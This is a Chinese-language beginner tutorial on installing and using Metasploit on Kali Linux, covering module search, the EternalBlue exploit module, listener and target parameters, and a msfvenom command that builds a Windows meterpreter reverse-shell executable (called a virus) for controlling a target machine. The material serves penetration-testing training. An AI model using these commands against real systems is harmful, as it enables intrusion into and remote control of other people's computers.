1.kali linux上安装
在终端输入:
sudo apt-get install metasploit-framework
若出现以下页面即为成功(图案一不一样没关系)
2.使用
msfconsole #打开metasploit
现在介绍一些最基本的命令
use [模块名称] #使用metasploit的某个模块 如:use multi/handler
search [关键字] #搜索某个模块
use和search还有一种方便的联合使用的方法如下例:
msf6 > search ms09
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
1 exploit/windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
2 exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
3 auxiliary/scanner/http/dir_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
4 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Authentication Bypass
5 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
6 exploit/windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow
7 exploit/windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability
8 exploit/windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption
9 exploit/windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
10 auxiliary/dos/windows/ftp/iis_list_exhaustion 2009-09-03 normal No Microsoft IIS FTP Server LIST Stack Exhaustion
11 exploit/windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
12 exploit/windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
13 auxiliary/dos/windows/smb/ms09_001_write normal No Microsoft SRV.SYS WriteAndX Invalid DataOffset
14 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
15 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
16 auxiliary/dos/windows/browser/ms09_065_eot_integer 2009-11-10 normal No Microsoft Windows EOT Font Table Directory Integer Overflow
Interact with a module by name or index. For example info 16, use 16 or use auxiliary/dos/windows/browser/ms09_065_eot_integer
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/mssql/ms09_004_sp_replwritetovarbin) >
options #查看正在使用的模块的必要参数
set [变量] [值] #在进入某个模块后,设置必须的参数值
现在详细介绍一下这个功能
先选定一个模块
use exploit/windows/smb/ms17_010_eternalblue
在use [模块]后,使用options查看参数
options
在所有的参数中,最重要的有四个:LHOST和LPORT(监听IP和端口),RHOST和RPORT(靶机IP和端口)
这四个参数要设置哪两个,依选择的模块而定。上图中,LHOST和LPORT已经被设置好了
接着设置参数值
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.1
lhost => 192.168.1.1
这样,对模块的设置就大功告成了,然后就用exploit/run运行模块
3.拓展
metasploit还有一个好用的拓展功能——msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8888 -f exe > home/test.exe
此时将会生成位于home文件夹且名为test.exe的可执行文件(病毒),与metasploit上的multi/handler模块配合,操控靶机电脑
#msfvenom的常见参数
-p 攻击载荷,常见的是windows/meterpreter/reverse_tcp
-f 文件格式,是采用exe还是vbs......
-o 文件路径,也可以用“>”代替,用法参照上面代码
-a 文件架构,如x86,x64,x86_64
下期讲msfvenom与multi/handler如何配合